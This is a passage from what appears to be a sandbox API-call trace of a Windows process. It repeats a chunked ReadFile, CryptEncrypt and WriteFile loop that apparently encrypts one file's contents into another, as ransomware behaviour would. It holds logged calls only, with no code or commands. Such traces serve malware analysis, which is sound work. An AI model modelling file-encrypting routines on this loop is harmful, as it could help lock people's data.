dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.560] GetLastError () returned 0x0 [0167.560] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.560] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.561] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.561] GetLastError () returned 0x0 [0167.561] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.561] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.561] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.561] GetLastError () returned 0x0 [0167.561] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.561] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.561] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.561] GetLastError () returned 0x0 [0167.561] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.561] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.561] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.561] GetLastError () returned 0x0 [0167.561] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.561] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.561] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.561] GetLastError () returned 0x0 [0167.561] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.561] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.561] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.561] GetLastError () returned 0x0 [0167.561] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.561] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.561] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.561] GetLastError () returned 0x0 [0167.562] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.562] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.562] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.562] GetLastError () returned 0x0 [0167.562] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.562] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.562] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.562] GetLastError () returned 0x0 [0167.562] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.562] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.562] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.562] GetLastError () returned 0x0 [0167.562] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.562] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.562] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.562] GetLastError () returned 0x0 [0167.562] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.562] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.562] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.562] GetLastError () returned 0x0 [0167.562] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.562] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.562] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.562] GetLastError () returned 0x0 [0167.562] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.562] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.563] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.563] GetLastError () returned 0x0 [0167.563] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.563] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.563] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.563] GetLastError () returned 0x0 [0167.563] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.563] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.563] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.563] GetLastError () returned 0x0 [0167.563] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.563] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.563] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.563] GetLastError () returned 0x0 [0167.563] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.563] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.563] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.563] GetLastError () returned 0x0 [0167.563] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.563] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.563] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.563] GetLastError () returned 0x0 [0167.563] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.563] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.564] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.564] GetLastError () returned 0x0 [0167.564] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.564] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.564] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.564] GetLastError () returned 0x0 [0167.564] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.564] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.564] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.564] GetLastError () returned 0x0 [0167.564] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.564] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.564] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.564] GetLastError () returned 0x0 [0167.564] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.564] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.564] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.564] GetLastError () returned 0x0 [0167.564] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.564] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.564] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.564] GetLastError () returned 0x0 [0167.564] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.564] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.564] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.564] GetLastError () returned 0x0 [0167.564] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.565] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.565] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.565] GetLastError () returned 0x0 [0167.565] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.565] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.565] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.565] GetLastError () returned 0x0 [0167.565] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.565] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.565] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.565] GetLastError () returned 0x0 [0167.565] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.565] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.565] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.565] GetLastError () returned 0x0 [0167.565] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.565] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.565] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.565] GetLastError () returned 0x0 [0167.565] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.565] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.565] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.565] GetLastError () returned 0x0 [0167.565] WriteFile 